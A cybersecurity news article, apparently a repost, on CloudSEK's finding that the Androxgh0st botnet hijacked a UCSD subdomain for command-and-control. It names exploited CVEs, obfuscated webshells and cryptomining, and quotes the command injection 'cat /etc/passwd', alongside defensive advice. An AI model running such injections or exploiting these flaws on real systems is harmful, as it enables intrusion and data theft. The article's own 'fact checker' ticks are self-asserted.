Androxgh0st Botnet Hijacks University Subdomain to Launch Global Cyber Attacks

By /

Listen to this Post

Featured Image

A Dangerous Shift in Botnet Strategy

CloudSEK has revealed a troubling development in the world of cyber threats. The notorious Androxgh0st botnet, which has been active since early 2023, has recently taken a bold step by compromising an academic domain. This isn’t just another round of automated cyberattacks — this marks a strategic escalation. The attackers hijacked a legitimate subdomain belonging to the University of California, San Diego (UCSD), repurposing it into a command-and-control (C2) hub to manage their malicious activities. By leveraging the trust of a respected institution, they’ve managed to slip under the radar of many defenses and continue launching attacks on vulnerable systems around the world.

Botnet Evolution and New Exploits

Since March 2023, Androxgh0st has evolved into a complex threat actor, utilizing over 20 different vulnerabilities across multiple platforms. The TRIAD team at CloudSEK has tracked its attacks targeting widely used frameworks like Apache Shiro, Spring Framework (Spring4Shell), WordPress plugins, and various IoT devices. The attackers use these exploits to achieve remote code execution (RCE), inject malicious commands, and exfiltrate sensitive data. In a significant shift, the group recently took control of a subdomain tied to the UCSD’s “USArhythms” portal — linked to the USA Basketball Men’s U19 National Team — and transformed it into a C2 logging panel.

The logs show how diverse and sophisticated their tactics are. Attacks include JNDI and OGNL injections, Unix command injections like cat /etc/passwd, and exploiting CVEs like CVE-2019-17574 in the WordPress “Popup Maker” plugin. IoT exploits include leveraging CVE-2021-21881 in the Lantronix WLANScanSSID function, giving attackers control of connected devices. Meanwhile, Spring4Shell (CVE-2022-22965) and Apache Struts OGNL payloads enable attackers to manipulate Java runtime environments.

Alongside these attacks, the botnet deploys cryptomining malware using JSON-RPC requests to extract computational resources from infected machines. Its arsenal includes multiple webshells — from abuok.php with hex obfuscation, to myabu.php using ROT13 — each serving different purposes like file uploads, persistent access, and script injections.

The fact that Androxgh0st now uses a compromised academic subdomain for C2 functions marks a dangerous precedent. It not only allows for covert control and coordination of attacks but also tarnishes the credibility of educational institutions. CloudSEK warns that this level of threat needs immediate countermeasures: patching known vulnerabilities, monitoring for suspicious webshells, restricting RMI/LDAP/JNDI traffic, and deploying Web Application Firewalls (WAF) or Runtime Application Self-Protection (RASP) tools.

What Undercode Say:

Strategic Pivot in Botnet Behavior

The hijacking of UCSD’s subdomain marks a tactical shift. Instead of simply scanning for random vulnerabilities, the operators are now using social engineering-like trust tactics — weaponizing the legitimacy of university domains to enhance the stealth of their operations. This not only helps them avoid detection but also improves the success rate of outbound C2 communication.

Exploitation of Critical CVEs

The botnet’s exploitation library is vast and up-to-date. CVEs like Spring4Shell and Apache Shiro vulnerabilities are well-documented in the cybersecurity space, but the fact that attackers continue to successfully use them points to slow patch adoption across many systems. This paints a bleak picture of cybersecurity hygiene among website operators, especially in educational and IoT environments.

Cryptomining as a Revenue Model

The integration of cryptomining functionality into the botnet reflects a growing monetization strategy. By infecting large networks and harnessing CPU power via JSON-RPC calls to crypto pools, the attackers aren’t just stealing data — they’re building a passive income stream. This adds a financial incentive that sustains and grows the botnet infrastructure over time.

Webshell Deployment is Tactical, Not Random

The presence of multiple webshells isn’t just for redundancy. Each one serves a distinct role in the attack lifecycle — whether it’s data exfiltration, persistence, or remote control. The use of obfuscation techniques (ROT13, hex2bin, eval) shows that attackers are actively working to bypass conventional detection systems. This level of sophistication means defenders must adopt advanced anomaly detection tools rather than rely on signature-based antivirus or basic monitoring.

Reputational Risk to Academia

Hosting malware from academic domains damages institutional trust. Universities are now in the crosshairs not just for their data but for their branding. Once a domain is blacklisted, its online reputation and trustworthiness can plummet, affecting everything from admissions to research collaborations.

Weaknesses in IoT Security

The exploitation of devices like Lantronix PremierWave highlights how vulnerable IoT infrastructures remain. These devices often lack robust patching mechanisms, and once compromised, they provide stable, long-term footholds for attackers. The fact that a botnet can leverage IoT to amplify its reach is a wake-up call for industries that depend on connected tech.

Call for a Multi-layered Defense

This situation proves once again that patching alone isn’t enough. Multi-layered security — from endpoint detection and response (EDR) to WAF and behavioral analysis — must become standard, especially in sectors managing public-facing infrastructure. CloudSEK’s detection suggestions such as monitoring POST parameters and outbound traffic should be part of every SOC team’s strategy.

Lessons from the IOC Table

The Indicators of Compromise listed reveal not only the IPs and domains used but also demonstrate how attackers rotate infrastructure to avoid blocking. The consistent use of “oast” domains for exfiltration is a pattern that defenders should actively monitor and block. The inclusion of specific MD5 hashes for webshells is invaluable for incident response teams trying to retroactively scan logs.

🔍 Fact Checker Results:

✅ CloudSEK has confirmed the hijack of UCSD’s subdomain and its use as a C2 panel
✅ The botnet exploits more than 20 known CVEs including Spring4Shell and Apache Shiro
✅ Indicators of Compromise include live domains, IPs, and webshell MD5s verified by researchers

📊 Prediction:

🔮 Androxgh0st’s use of trusted infrastructure is likely to expand, with future attacks possibly targeting other academic or government institutions to bypass security filters. Cryptomining will remain a core monetization model, but the real danger lies in stealth persistence and long-term exploitation of unpatched, under-monitored systems. Expect a surge in similar subdomain hijacks unless security audits become routine across educational and public sector networks.

References:

Reported By: cyberpress.org
Extra Source Hub:
https://www.github.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related posts:

  1. Aflac Data Breach Exposes Insurance Sector’s Cybersecurity Vulnerabilities
  2. NVIDIA Explores Humanoid Robots for AI Server Manufacturing

Explore More: